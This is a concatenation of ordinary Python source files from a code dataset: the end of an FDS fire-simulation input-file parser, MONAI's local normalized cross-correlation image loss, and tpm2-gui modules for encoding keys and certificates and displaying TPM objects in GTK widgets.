line2 = "%s,"%(line2) if line2[-1] != ',' else line2
line2 = '%s /'%(line2)
while ',,' in line2: line2 = line2.replace(',,',',')
while ' ,' in line2: line2 = line2.replace(' ,',',')
while ' ' in line2: line2 = line2.replace(" ", " ")
while ',,' in line2: line2 = line2.replace(',,',',')
line_tmp = list(line2)
if line_tmp[4] == ',':
line_tmp[4] = ' '
line2 = "".join(line_tmp)
while ' ' in line2: line2 = line2.replace(" ", " ")
linesFDS[i] = line2
lineTypes = [x[:4] for x in linesFDS]
if 'TAIL' in lineTypes:
ind = np.argwhere([True if x == 'TAIL' else False for x in lineTypes])[0][0]
linesFDS = linesFDS[:ind]
return linesFDS
def makeLinesFromDict(self, items, types, prefix, newline=False):
"""Returns a str generated from a namelist dictionary
This function generates a text string from a namelist
dictionary.
Parameters
----------
items : dict
Dictionary containing key pairs from a namelist group
types : dict
Dictionary containing types from a namelist group
prefix : str
String containing the namelist type
newline : bool, optional
Flag specifying whether each key in the namelist is to be
entered on the same of different lines
Returns
-------
str
Text containing name list line
"""
text = ''
keys = list(items.keys())
keys.sort()
if 'unknownCounter' in keys: keys.remove('unknownCounter')
if 'newline' in keys: keys.remove('newline')
for key in keys:
text = "%s%s "%(text, prefix)
text = self.keyAssist(text, types, items[key], newline=newline)
text = "%s /\n"%(text)
return text
def makeMESH(self, meshes, meshTypes, order=False):
"""Returns a str generated from a meshes namelist dictionary.
Parameters
----------
meshes : dict
Dictionary containing mesh definitions
meshTypes : dict
Dictionary containing types from mesh namelists
order : list, optional
Order to output mehes. If False, meshes are not output in
any particular order. (default False)
Returns
-------
str
Text line generated from dictionary
"""
text = ''
meshList = list(meshes.keys())
if 'unknownCounter' in meshList:
meshList.remove('unknownCounter')
if (order is not False): meshList = [meshList[x] for x in order]
for key in meshList:
text = "%s&MESH "%(text)
text = self.keyAssist(text, meshTypes, meshes[key])
text = "%s /\n"%(text)
return text
def makeRAMP(self, ramps):
"""Returns a str generated from a ramps namelist dictionary.
Parameters
----------
ramps : dict
Dictionary containing ramp definitions
Returns
-------
str
Text line generated from dictionary
"""
text = ''
for key in list(ramps.keys()):
ID = ramps[key]['ID']
makeControl = True
for F, T in zip(ramps[key]['F'], ramps[key]['T']):
if makeControl and ramps[key]['CTRL_ID']:
text = "%s&RAMP ID='%s', T = %0.4f, F = %0.4f, CTRL_ID='%s'/\n"%(text, ID, T, F, ramps[key]['CTRL_ID'])
makeControl = False
else:
text = "%s&RAMP ID='%s', T = %0.4f, F = %0.4f, /\n"%(text, ID, T, F)
return text
def mergeTypeFromLineType(self, lineType):
"""Returns internal merge type based on namelist type.
Parameters
----------
lineType : str
String containing namelist type
Returns
-------
str
String containing merge type for namelist type
"""
key = 'unknown'
if lineType == 'HEAD': key = 'merge'
if lineType == 'DEVC': key = 'enumerate'
if lineType == 'INIT': key = 'enumerate'
if lineType == 'OBST': key = 'enumerate'
if lineType == 'VENT': key = 'enumerate'
if lineType == 'SURF': key = 'enumerate'
if lineType == 'RAMP': key = 'append'
if lineType == 'CTRL': key = 'enumerate'
if lineType == 'MESH': key = 'enumerate'
if lineType == 'SLCF': key = 'enumerate'
if lineType == 'BNDF': key = 'enumerate'
if lineType == 'TIME': key = 'merge'
if lineType == 'DUMP': key = 'merge'
if lineType == 'MISC': key = 'merge'
if lineType == 'ZONE': key = 'enumerate'
if lineType == 'REAC': key = 'enumerate'
if lineType == 'MATL': key = 'enumerate'
if lineType == 'RADI': key = 'merge'
if lineType == 'PRES': key = 'merge'
if lineType == 'HOLE': key = 'enumerate'
if lineType == 'PART': key = 'enumerate'
if lineType == 'PROP': key = 'enumerate'
if lineType == 'SPEC': key = 'enumerate'
if lineType == 'PROF': key = 'enumerate'
if lineType == 'WIND': key = 'merge'
return key
def parseFDSLines(self, lines):
"""Adds each line to internal attribute namelist dictionaries.
Parameters
----------
lines : list
List containing strings of namelist lines
"""
for line in lines:
lineType = self.getLineType(line)
key = self.keyFromLineType(lineType)
types = fdsLineTypes(version=self.version)
self.parseLine(line, lineType, types, key)
devcKeys = list(self.devcs.keys())
devcKeys.remove('unknownCounter')
for key in devcKeys:
if self.devcs[key]['INIT_ID']:
initXYZ = self.inits[self.devcs[key]['INIT_ID']]['XYZ']
self.devcs[key]['XYZ'] = initXYZ
else:
self.devcs[key].pop('INIT_ID')
def parseLine(self, line, lineType, types, key):
"""Adds one line to the internal attribute namelist dictionary.
Parameters
----------
line : str
String containing namelist line
lineType : str
String containing namelist line type
types : dict
Dictionary containing key types for namelist pair
key : str
String containing internal attribute key for namelist line
type
"""
#print(line)
check = True
try:
lineDict = self.dictFromLine(line, lineType, types)
except:
print("WARNING: Unknown line in input file.\n")
print("%s\n"%(line))
check = False
if check:
tmp = getattr(self, key)
mergeType = self.mergeTypeFromLineType(lineType)
if mergeType == 'merge':
if not tmp['ID']: tmp['ID'] = defaultdict(bool)
tmp['ID'] = self.dictMerge(tmp['ID'], lineDict)
setattr(self, key, tmp)
elif mergeType == 'append':
ID = lineDict['ID']
if tmp[ID]:
for keyID2 in list(lineDict.keys()):
keyType = getattr(types, lineType.lower())[keyID2]
keyValue = lineDict[keyID2]
if (keyType == 'listrowfloat'):
for v in keyValue:
tmp[ID][keyID2].append(v)
else:
tmp[ID] = lineDict
elif mergeType == 'enumerate':
ID = lineDict['ID']
if ID is False:
ID = "ID"
lineDict["ID"] = ID
if tmp[ID]:
counter = tmp[ID]['counter']
if lineDict['ID'] == False: lineDict["ID"] = "%s-%04.0f"%(ID, counter)
tmp["%s-%04.0f"%(ID, counter)] = lineDict
tmp[ID]['counter'] += 1
pass
else:
tmp[ID] = lineDict
tmp[ID]['counter'] = 0
else:
assert False, "Stopped"
def saveModel(self, mpiProcesses, location,
allowMeshSplitting=True, splitMultiplier=1.2,
meshSplitAxes=[True, True, False]):
"""Saves an fds input file
Input file is generated based on internal attribute namelist
dictionaries. This functiona also allows splitting of meshes to
optimize mpi processes balance.
Parameters
----------
mpiProcesses : int
The number of mpi processes to define in the input file
location : str
The path location to save the input file
allowMeshSplitting : bool, optional
Flag to enable mesh splitting for balancing mpi processes
(default is True)
splitMultiplier : float, optional
Tolerance used in mesh splitting (default is 1.2)
meshSplitAxes : list of booleans, optional
Specifies along which axes the software is allowed to split
meshes
"""
self.addMPIprocesses(
mpiProcesses, allowMeshSplitting=allowMeshSplitting,
splitMultiplier=splitMultiplier,
meshSplitAxes=meshSplitAxes)
text = self.generateFDStext()
with open(location, 'w') as f:
f.write(text)
print("Input file written to: %s"%(location))
def splitLineIntoKeys(self, line2):
"""Returns namelist key pairs from a line.
Parameters
----------
line2 : str
String containing namelist line
Returns
-------
list
List containing namelist keys
"""
line = line2.replace('\n', ',').replace('\r', ',')
while (',,' in line) or (' ' in line):
line = line.replace(',,', ',').replace(' ', ' ')
regex1 = r"(\(.{0,3}),(.{0,3}\))"
regex2 = r"\1;\2"
try:
line = re.sub(regex1, regex2, line)
except:
pass
keys = line.split(',')
keys[0] = keys[0][4:]
updatedKeys = []
txt = ''
for i in range(0,len(keys)):
if '=' in keys[i]:
updatedKeys.append(txt)
txt = keys[i]
else:
txt = ','.join([txt,keys[i]])
updatedKeys.append(txt)
while '' in updatedKeys:
updatedKeys.remove('')
for i, txt in enumerate(updatedKeys):
while txt[0] == ' ':
txt = txt[1:]
updatedKeys[i] = txt
for i, txt in enumerate(updatedKeys):
while txt[-1] == ' ' or txt[-1] == ',' or txt[-1] == '/':
txt = txt[:-1]
updatedKeys[i] = txt
return updatedKeys
def splitMESHonce(self, mesh, meshSplitAxes):
"""Splits a mesh along its largest axis.
Parameters
----------
mesh : dict
Dictionary containing information for a single mesh
meshSplitAxes : list of booleans
Specifies along which axes the software is allowed to split
the mesh.
"""
IJK = np.round(mesh['IJK'])
XB = mesh['XB']
dxs = [(XB[1]-XB[0])/float(IJK[0]), (XB[3]-XB[2])/float(IJK[1]), (XB[5]-XB[4])/float(IJK[2])]
ind = np.argmax(IJK)
IJK_temp = list(IJK)
while meshSplitAxes[ind] is False:
IJK_temp = list(IJK_temp)
IJK_temp[ind] = 0
ind = np.argmax(IJK_temp)
if np.sum(IJK_temp) == 0:
print("Failed to split mesh.")
break
IJK2 = list(IJK)
XB2 = list(XB)
IJK2[ind] = int(IJK[ind]/2)
if IJK2[ind] % 2 > 0: IJK2[ind] = IJK2[ind]-1
XB2[int(2*ind+1)] = XB2[int(2*ind)] + dxs[ind]*float(IJK2[ind])
IJK3 = list(IJK)
XB3 = list(XB)
IJK3[ind] = IJK[ind] - IJK2[ind]
XB3[int(2*ind)] = XB2[int(2*ind+1)]
mesh2 = defaultdict(bool)
mesh2['ID'] = "%s-00"%(mesh["ID"])
mesh2['XB'] = XB2
mesh2['IJK'] = IJK2
mesh3 = defaultdict(bool)
mesh3['ID'] = "%s-01"%(mesh["ID"])
mesh3['XB'] = XB3
mesh3['IJK'] = IJK3
self.meshes.pop(mesh['ID'], False)
self.meshes[mesh2['ID']] = mesh2
self.meshes[mesh3['ID']] = mesh3
def zopen(self, file):
"""Opens a file or zip archive for reading.
Parameters
----------
file : str
String containing path to file or zip archive
Returns
-------
file
Open binary file for reading
"""
if '.zip' in file:
zname = '%s.zip'%(file.split('.zip')[0])
fname = file.split('.zip%s'%(os.sep))[1]
zip = zipfile.ZipFile(zname, 'r')
f = zip.open(fname)
else:
f = open(file, 'rb')
return f
``` |
{
"source": "JoHof/MONAI",
"score": 2
} |
#### File: monai/losses/image_dissimilarity.py
```python
from typing import Union
import torch
from torch.nn import functional as F
from torch.nn.modules.loss import _Loss
from monai.networks.layers import gaussian_1d, separable_filtering
from monai.utils import LossReduction
def make_rectangular_kernel(kernel_size: int) -> torch.Tensor:
return torch.ones(kernel_size)
def make_triangular_kernel(kernel_size: int) -> torch.Tensor:
fsize = (kernel_size + 1) // 2
if fsize % 2 == 0:
fsize -= 1
f = torch.ones((1, 1, fsize), dtype=torch.float).div(fsize)
padding = (kernel_size - fsize) // 2 + fsize // 2
return F.conv1d(f, f, padding=padding).reshape(-1)
def make_gaussian_kernel(kernel_size: int) -> torch.Tensor:
sigma = torch.tensor(kernel_size / 3.0)
kernel = gaussian_1d(sigma=sigma, truncated=kernel_size // 2, approx="sampled", normalize=False) * (
2.5066282 * sigma
)
return kernel[:kernel_size]
kernel_dict = {
"rectangular": make_rectangular_kernel,
"triangular": make_triangular_kernel,
"gaussian": make_gaussian_kernel,
}
class LocalNormalizedCrossCorrelationLoss(_Loss):
"""
Local squared zero-normalized cross-correlation.
The loss is based on a moving kernel/window over the y_true/y_pred,
within the window the square of zncc is calculated.
The kernel can be a rectangular / triangular / gaussian window.
The final loss is the averaged loss over all windows.
Adapted from:
https://github.com/voxelmorph/voxelmorph/blob/legacy/src/losses.py
DeepReg (https://github.com/DeepRegNet/DeepReg)
"""
def __init__(
self,
in_channels: int,
ndim: int = 3,
kernel_size: int = 9,
kernel_type: str = "rectangular",
reduction: Union[LossReduction, str] = LossReduction.MEAN,
smooth_nr: float = 1e-7,
smooth_dr: float = 1e-7,
) -> None:
"""
Args:
in_channels: number of input channels
ndim: number of spatial ndimensions, {``1``, ``2``, ``3``}. Defaults to 3.
kernel_size: kernel spatial size, must be odd.
kernel_type: {``"rectangular"``, ``"triangular"``, ``"gaussian"``}. Defaults to ``"rectangular"``.
reduction: {``"none"``, ``"mean"``, ``"sum"``}
Specifies the reduction to apply to the output. Defaults to ``"mean"``.
- ``"none"``: no reduction will be applied.
- ``"mean"``: the sum of the output will be divided by the number of elements in the output.
- ``"sum"``: the output will be summed.
smooth_nr: a small constant added to the numerator to avoid nan.
smooth_dr: a small constant added to the denominator to avoid nan.
"""
super(LocalNormalizedCrossCorrelationLoss, self).__init__(reduction=LossReduction(reduction).value)
self.in_channels = in_channels
self.ndim = ndim
if self.ndim not in [1, 2, 3]:
raise ValueError(f"Unsupported ndim: {self.ndim}-d, only 1-d, 2-d, and 3-d inputs are supported")
self.kernel_size = kernel_size
if self.kernel_size % 2 == 0:
raise ValueError(f"kernel_size must be odd, got {self.kernel_size}")
if kernel_type not in kernel_dict.keys():
raise ValueError(
f'Unsupported kernel_type: {kernel_type}, available options are ["rectangular", "triangular", "gaussian"].'
)
self.kernel = kernel_dict[kernel_type](self.kernel_size)
self.kernel_vol = torch.sum(self.kernel) ** self.ndim
self.smooth_nr = float(smooth_nr)
self.smooth_dr = float(smooth_dr)
def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""
Args:
input: the shape should be BNH[WD].
target: the shape should be BNH[WD].
Raises:
ValueError: When ``self.reduction`` is not one of ["mean", "sum", "none"].
"""
assert (
input.shape[1] == self.in_channels
), f"expecting input with {self.in_channels} channels, got input of shape {input.shape}"
assert (
input.ndim - 2 == self.ndim
), f"expecting input with {self.ndim} spatial dimensions, got input of shape {input.shape}"
assert (
target.shape == input.shape
), f"ground truth has differing shape ({target.shape}) from input ({input.shape})"
t2, p2, tp = target ** 2, input ** 2, target * input
# sum over kernel
t_sum = separable_filtering(target, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
p_sum = separable_filtering(input, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
t2_sum = separable_filtering(t2, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
p2_sum = separable_filtering(p2, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
tp_sum = separable_filtering(tp, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
# average over kernel
t_avg = t_sum / self.kernel_vol
p_avg = p_sum / self.kernel_vol
# normalized cross correlation between t and p
# sum[(t - mean[t]) * (p - mean[p])] / std[t] / std[p]
# denoted by num / denom
# assume we sum over N values
# num = sum[t * p - mean[t] * p - t * mean[p] + mean[t] * mean[p]]
# = sum[t*p] - sum[t] * sum[p] / N * 2 + sum[t] * sum[p] / N
# = sum[t*p] - sum[t] * sum[p] / N
# = sum[t*p] - sum[t] * mean[p] = cross
# the following is actually squared ncc
cross = tp_sum - p_avg * t_sum
t_var = t2_sum - t_avg * t_sum # std[t] ** 2
p_var = p2_sum - p_avg * p_sum # std[p] ** 2
ncc: torch.Tensor = (cross * cross + self.smooth_nr) / (t_var * p_var + self.smooth_dr)
# shape = (batch, 1, D, H, W)
if self.reduction == LossReduction.SUM.value:
return torch.sum(ncc).neg() # sum over the batch and spatial ndims
if self.reduction == LossReduction.NONE.value:
return ncc.neg()
if self.reduction == LossReduction.MEAN.value:
return torch.mean(ncc).neg() # average over the batch and spatial ndims
raise ValueError(f'Unsupported reduction: {self.reduction}, available options are ["mean", "sum", "none"].')
``` |
{
"source": "joholl/tpm2-gui",
"score": 2
} |
#### File: tpm2_gui/ui/encoding.py
```python
from enum import IntEnum, auto
from pathlib import Path
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePublicKey
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey
from cryptography.x509 import Certificate
# +=========================================================+
# | Encoding: | String | Hex | Hexdump | PEM | DER | Info |
# +============+=========+=====+=========+=====+=====+======+
# | Bytearray | y | y | y | - | - | - |
# | Bytes | y | y | y | - | - | - |
# | String | y | y | y | - | - | - |
# | EC Pub Key | - | - | - | y | y | y |
# | Cert | - | - | - | y | y | y |
# +============+=========+=====+=========+=====+=====+======+
# TODO UInt64 and Bitfield (byte-like)
class Encoding(IntEnum):
"""Encoding Options."""
String = auto()
Hex = auto()
Hexdump = auto()
PEM = auto()
DER = auto()
Info = auto()
UInt64 = auto()
Bitfield = auto()
def __str__(self):
return {
Encoding.String: "String",
Encoding.Hex: "Hex",
Encoding.Hexdump: "Hexdump",
Encoding.PEM: "PEM",
Encoding.DER: "DER (Hex)",
Encoding.Info: "Info",
Encoding.UInt64: "Integer",
Encoding.Bitfield: "Bitfield",
}[self]
class ValueType(IntEnum):
"""Value Types which are to be encoded."""
Bytearray = auto()
Bytes = auto()
String = auto()
Path = auto()
ECPublicKey = auto()
RSAPublicKey = auto()
Cert = auto()
@staticmethod
def from_value(value):
"""Autodetect the ValueType."""
# cast value to bytes if it is not already
if isinstance(value, bytearray):
return ValueType.Bytearray
if isinstance(value, bytes):
return ValueType.Bytes
if isinstance(value, str):
return ValueType.String
if isinstance(value, Path):
return ValueType.Path
if isinstance(value, EllipticCurvePublicKey):
return ValueType.ECPublicKey
if isinstance(value, RSAPublicKey):
return ValueType.RSAPublicKey
if isinstance(value, Certificate):
return ValueType.Cert
raise ValueError(f"Could not find ValueType for value {value}")
class Encoder:
"""Utility class for encoding values."""
@staticmethod
def _bytes_to_string(value):
try:
return value.decode("utf-8")
except UnicodeDecodeError as error:
return (
f"Error: cannot decode byte {bytes([value[error.start]])} at index {error.start}. "
f"Hint: Use Encoding '{str(Encoding.Hex)}'"
)
@staticmethod
def _bytes_to_hex(value):
return " ".join("{:02x}".format(b) for b in value)
@staticmethod
def _bytes_to_hexdump(value, line_len=16):
"""Get hexdump from bytearray."""
char_map = "".join([(len(repr(chr(b))) == 3) and chr(b) or "." for b in range(256)])
lines = []
# for each line
for offset in range(0, len(value), line_len):
line_text = value[offset : offset + line_len]
line_hex = " ".join(["%02x" % b for b in line_text])
# replace non-printable chars with '.'
printable = "".join(["%s" % ((b <= 127 and char_map[b]) or ".") for b in line_text])
lines.append("%04x %-*s |%s|\n" % (offset, line_len * 3, line_hex, printable))
return "".join(lines)
@staticmethod
def _int_to_hex(value):
value_hex = f"{value:x}"
# pad to even number of digits
if len(value_hex) % 2 != 0:
value_hex = f"0{value_hex}"
# group two each
return " ".join(f"{a}{b}" for (a, b) in zip(value_hex[::2], value_hex[1::2]))
@staticmethod
def _bytes_like_to_bytes(value):
"""Cast bytes-like value (bytearray, bytes, string) to bytes."""
if isinstance(value, bytearray):
return bytes(value)
if isinstance(value, str):
return value.encode("utf-8")
if isinstance(value, Path):
return str(value).encode("utf-8")
if isinstance(value, bytes):
return value
raise ValueError(f"Could not convert byte-like value to bytes: {value}")
@staticmethod
def _encode_bytes_like(value, encoding):
"""Encode bytes-like value (bytearray, bytes, string)."""
value = Encoder._bytes_like_to_bytes(value)
# encode
return {
Encoding.String: Encoder._bytes_to_string,
Encoding.Hex: Encoder._bytes_to_hex,
Encoding.Hexdump: Encoder._bytes_to_hexdump,
}[encoding](value)
@staticmethod
def _encode_ec_public_key(value, encoding):
"""Encode an EllipticCurvePublicKey."""
return {
Encoding.PEM: Encoder._bytes_to_string(
value.public_bytes(
serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.DER: Encoder._bytes_to_hex(
value.public_bytes(
serialization.Encoding.DER, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.Info: f"""
EC Public Key
Curve: {value.curve.name}
Key Size: {value.key_size}
X: {Encoder._int_to_hex(value.public_numbers().x)}
Y: {Encoder._int_to_hex(value.public_numbers().y)}
""".strip(),
}[encoding]
@staticmethod
def _encode_rsa_public_key(value, encoding):
"""Encode an RSAPublicKey."""
return {
Encoding.PEM: Encoder._bytes_to_string(
value.public_bytes(
serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.DER: Encoder._bytes_to_hex(
value.public_bytes(
serialization.Encoding.DER, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.Info: f"""
RSA Public Key
Key Size: {value.key_size}
Modulus n: {Encoder._int_to_hex(value.public_numbers().n)}
Exponent e: {Encoder._int_to_hex(value.public_numbers().e)}
""".strip(),
}[encoding]
@staticmethod
def _encode_cert(value, encoding):
"""Encode a Certificate."""
oid_name = (
value.signature_algorithm_oid._name # [TODO refactor] pylint: disable=protected-access
)
return {
Encoding.PEM: Encoder._bytes_to_string(value.public_bytes(serialization.Encoding.PEM)),
Encoding.DER: Encoder._bytes_to_hex(value.public_bytes(serialization.Encoding.DER)),
Encoding.Info: f"""
X.509 Certificate
Issuer: {", ".join(e.rfc4514_string() for e in value.issuer.rdns)}
Subject: {", ".join(e.rfc4514_string() for e in value.issuer.rdns)}
Serial No.: {Encoder._int_to_hex(value.serial_number)}
Not valid before: {value.not_valid_before}
Not valid afer: {value.not_valid_after}
Version: {value.version}
Signature Hash Alg: {value.signature_hash_algorithm.name}
Signature Alg OID: {value.signature_algorithm_oid.dotted_string} ({oid_name})
Public Key: {value.public_key}
Signature: {" ".join("{:02x}".format(b) for b in value.signature)}
Fingerprint: {" ".join("{:02x}".format(b) for b in value.fingerprint(hashes.SHA256()))}
Extensions: {value.extensions} # TODO
""".strip(),
}[encoding]
@staticmethod
def encode(value, encoding):
"""Encode a value according to the given encoding option."""
if not value:
return ""
value_type = ValueType.from_value(value)
return {
ValueType.Bytearray: Encoder._encode_bytes_like,
ValueType.Bytes: Encoder._encode_bytes_like,
ValueType.String: Encoder._encode_bytes_like,
ValueType.Path: Encoder._encode_bytes_like,
ValueType.ECPublicKey: Encoder._encode_ec_public_key,
ValueType.RSAPublicKey: Encoder._encode_rsa_public_key,
ValueType.Cert: Encoder._encode_cert,
}[value_type](value, encoding)
```
#### File: tpm2_gui/ui/objects.py
```python
import gi # isort:skip
gi.require_version("Gtk", "3.0") # pylint: disable=wrong-import-position
# isort:imports-thirdparty
from gi.repository import Gtk
from .widgets import Encoding, ValueEditView, ValueView
class ObjectDetails(Gtk.Grid):
"""Make the details to a TPM object accessible, e.g. the associated app data and description."""
def __init__(self, tpm):
super().__init__(column_spacing=10, row_spacing=10)
self._tpm = tpm
self._path = None
self._tpm_object = None
self.get_style_context().add_class("object_details")
row = 0
self.heading_lbl = Gtk.Label(xalign=0)
self.heading_lbl.get_style_context().add_class("object_details_heading")
self.heading_lbl.set_use_markup(True)
self.attach(self.heading_lbl, 0, row, 3, 1)
row += 1
self._value_views = [
ValueView("Path", self._tpm_object, "path", multiline=False),
ValueView("Keystore File", self._tpm_object, "json_path", multiline=False),
ValueEditView(
"Description",
self._tpm_object,
"description",
encodings=[Encoding.String],
),
ValueEditView(
"Application Data",
self._tpm_object,
"appdata",
encodings=[Encoding.String, Encoding.Hex, Encoding.Hexdump],
),
ValueView(
"Public Key",
self._tpm_object,
"public",
encodings=[Encoding.Info, Encoding.PEM, Encoding.DER],
),
ValueView(
"Object Attributes",
self._tpm_object,
"attributes",
encodings=[Encoding.String],
),
ValueView(
"Policy",
self._tpm_object,
"policy",
encodings=[Encoding.String],
),
ValueEditView(
"Certificate",
self._tpm_object,
"certificate",
encodings=[Encoding.Info, Encoding.PEM, Encoding.DER],
),
ValueView("NV Type", self._tpm_object, "nv_type", multiline=False),
ValueEditView(
"NV (secure memory)",
self._tpm_object,
"nv",
encodings=[Encoding.String, Encoding.Hex, Encoding.Hexdump],
),
]
for value_view in self._value_views:
value_view.attach_to_grid(self, row)
row += 1
self.update()
def _get_tpm_path(self):
return self._path
def set_tpm_path(self, path):
"""Set the TPM object path. The details of this TPM object are made accessible."""
self._path = path
self._tpm_object = self._tpm.fapi_object(self._path)
for value_view in self._value_views:
value_view.set_tpm_object(self._tpm_object)
self.update()
def reset(self, *args, **kwargs): # pylint: disable=unused-argument
"""Reset all widget state."""
for value_view in self._value_views:
value_view.reset()
def update(self):
"""Update the widget state according to the currently selected path."""
if self._path is not None:
obj = self._tpm.fapi_object(self._path)
self.heading_lbl.set_text(obj.object_type_info)
for value_view in self._value_views:
value_view.automatic_visibility()
value_view.update()
class Objects(Gtk.TreeView):
"""A widget for listing and selecting a FAPI TPM object."""
def _tree_store_append(self, tree_data, path_parent="", piter_parent=None):
"""
Take the dict tree_data and append it to the tree_store
The root key will not be added
"""
for key, value in tree_data.items():
path = f"{path_parent}/{key}"
piter_this = self._store.append(
piter_parent, [key, self._tpm.fapi_object(path).object_type_info]
)
self._tree_store_append(value, path_parent=path, piter_parent=piter_this)
def update(self):
"""
Fetch TPM objects and update tree_view
"""
self._store.clear()
path_tree = self._tpm.get_path_tree()[""]
self._tree_store_append(path_tree)
self.expand_all()
def _path_from_tree_path(self, tree_path):
"""
Get TPM object path from a tree_path object (pointing to a node in tree_store)
"""
model = self.get_model()
# walk through tree from root to node at tree_path
path = ""
walk_indices = []
for walk_index in tree_path:
walk_indices.append(walk_index)
walk_tree_path = Gtk.TreePath.new_from_indices(walk_indices)
path += "/" + model[walk_tree_path][0]
return path
def _on_view_selection_changed(self, selection):
"""
Determine the TPM object path of the selected row and call all listener functions
"""
model, treeiter = selection.get_selected()
tree_path = model.get_path(treeiter)
path = self._path_from_tree_path(tree_path)
if self.on_selection_fcns is not None:
for on_selection_fcn in self.on_selection_fcns:
on_selection_fcn(path)
def __init__(self, tpm, on_selection_fcns=None):
super().__init__()
self._tpm = tpm
self._store = Gtk.TreeStore(str, str)
self.set_hexpand(False)
self.set_vexpand(False)
self.set_model(self._store)
# TODO selection must be always exactly 1 (comma must not unselect)
# column TPM Entity
renderer_column_obj = Gtk.CellRendererText()
column_obj = Gtk.TreeViewColumn("TPM Entity", renderer_column_obj, text=0)
self.append_column(column_obj)
# column Info
renderer_column_info = Gtk.CellRendererText()
column_info = Gtk.TreeViewColumn("Info", renderer_column_info, text=1)
self.append_column(column_info)
select = self.get_selection()
select.connect("changed", self._on_view_selection_changed)
if on_selection_fcns is not None:
self.on_selection_fcns = on_selection_fcns
else:
self.on_selection_fcns = []
self.update()
```
#### File: tpm2_gui/ui/widgets.py
```python
import gi # isort:skip
gi.require_version("Gtk", "3.0") # pylint: disable=wrong-import-position
# isort:imports-thirdparty
from gi.repository import Gtk
from .encoding import Encoder, Encoding
class EncodingChooser(Gtk.ComboBox):
"""Widget to choose an encoding from a list of options."""
def __init__(self, options, on_selection=None):
super().__init__()
self.options = Gtk.ListStore(int, str)
for enconding_option in options:
self.options.append([int(enconding_option), str(enconding_option)])
self.set_model(self.options)
cell = Gtk.CellRendererText()
self.pack_start(cell, True)
self.add_attribute(cell, "text", 1)
self.set_active(0)
self.connect("changed", self._on_changed)
self._on_selection = []
if on_selection:
self._on_selection.append(on_selection)
@property
def selected(self):
"""The Encoding currently selected."""
index = self.get_model()[self.get_active_iter()][:2][0]
return Encoding(index)
def _on_changed(self, _widget):
for callback in self._on_selection:
callback(self.selected)
class ValueView:
"""A text field consisting of a label, a text box and a button for editing and saving."""
def __init__(self, label, obj, attr, encodings=None, multiline=True):
self._obj = obj
self._attr = attr
self._encoding = Encoding.String
self._encoding_cmb = None
if encodings:
self._encoding = encodings[0]
if len(encodings) > 1:
self._encoding_cmb = EncodingChooser(encodings, self._on_encoding_changed)
self._encoding_cmb_vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._encoding_cmb_vbox.add(self._encoding_cmb)
self._label = Gtk.Label(label=label, xalign=0)
self._label.set_width_chars(16)
if multiline:
self._textview_model = Gtk.TextBuffer()
self._textview = Gtk.TextView(buffer=self._textview_model)
self._textview.set_hexpand(True)
self._textview.set_monospace(True)
self._textview.set_editable(False)
scroll = Gtk.ScrolledWindow()
scroll.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scroll.set_max_content_height(200)
scroll.set_min_content_width(500)
scroll.set_propagate_natural_height(True)
scroll.add(self._textview)
frame = Gtk.Frame()
frame.add(scroll)
self._textview_widget = frame
else:
self._textview = Gtk.Entry()
self._textview.set_hexpand(True)
self._textview.set_editable(False)
self._textview_model = self._textview
self._textview_widget = self._textview
self.update()
def _on_encoding_changed(self, encoding):
self._encoding = encoding
self.update()
def set_tpm_object(self, obj):
"""Set TPM object whose whose attribute is made accessible."""
self._obj = obj
self.update()
def hide(self):
"""Hide all associated widgets."""
self._label.hide()
self._textview_widget.hide()
if self._encoding_cmb:
self._encoding_cmb_vbox.hide()
def show(self):
"""Show all associated widgets."""
self._label.show()
self._textview_widget.show()
if self._encoding_cmb:
self._encoding_cmb_vbox.show()
def automatic_visibility(self):
"""Show if TPM attribute exists for path, hide otherwise."""
if self._obj is None or getattr(self._obj, self._attr) is None:
self.hide()
else:
self.show()
def reset(self): # pylint: disable=unused-argument
"""Reset all widget state."""
self._textview.set_editable(False)
self.update()
def attach_to_grid(self, grid, row):
"""Attach all wigets to a given row in a Gtk.Grid."""
grid.attach(self._label, 0, row, 1, 1)
grid.attach(self._textview_widget, 1, row, 1, 1)
if self._encoding_cmb:
grid.attach(self._encoding_cmb_vbox, 2, row, 1, 1)
def update(self):
"""Update the widget state according to the currently selected path."""
if self._obj is not None:
text = getattr(self._obj, self._attr)
if text is not None:
self._textview_model.set_text(Encoder.encode(text, self._encoding))
class ValueEditView(ValueView):
"""A text field consisting of a label, a text box and a button for editing and saving."""
def __init__(self, label, obj, attr, encodings=None, multiline=True):
super().__init__(label, obj, attr, encodings, multiline)
self._button = Gtk.Button(label="Edit")
self._button.connect("clicked", self._on_button_clicked)
self._button_vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._button_vbox.add(self._button)
self.update()
def _on_button_clicked(self, button): # pylint: disable=unused-argument
if self._textview.get_editable():
# Safe text
text = self._textview_model.get_text(
self._textview_model.get_start_iter(), self._textview_model.get_end_iter(), True
)
setattr(self._obj, self._attr, text)
self._textview.set_editable(False)
else:
# Enable editing text
self._textview.set_editable(True)
self.update()
def hide(self):
"""Hide all associated widgets."""
super().hide()
self._button_vbox.hide()
def show(self):
"""Show all associated widgets."""
super().show()
self._button_vbox.show()
def reset(self): # pylint: disable=unused-argument
"""Reset all widget state."""
super().reset()
self.update()
def attach_to_grid(self, grid, row):
super().attach_to_grid(grid, row)
grid.attach(self._button_vbox, 3, row, 1, 1)
def update(self):
"""Update the widget state according to the currently selected path."""
super().update()
if self._obj is not None:
text = str(getattr(self._obj, self._attr))
self._button.set_sensitive(text is not None)
if self._textview.get_editable():
self._button.set_label("Safe")
else:
self._button.set_label("Edit")
``` |
{
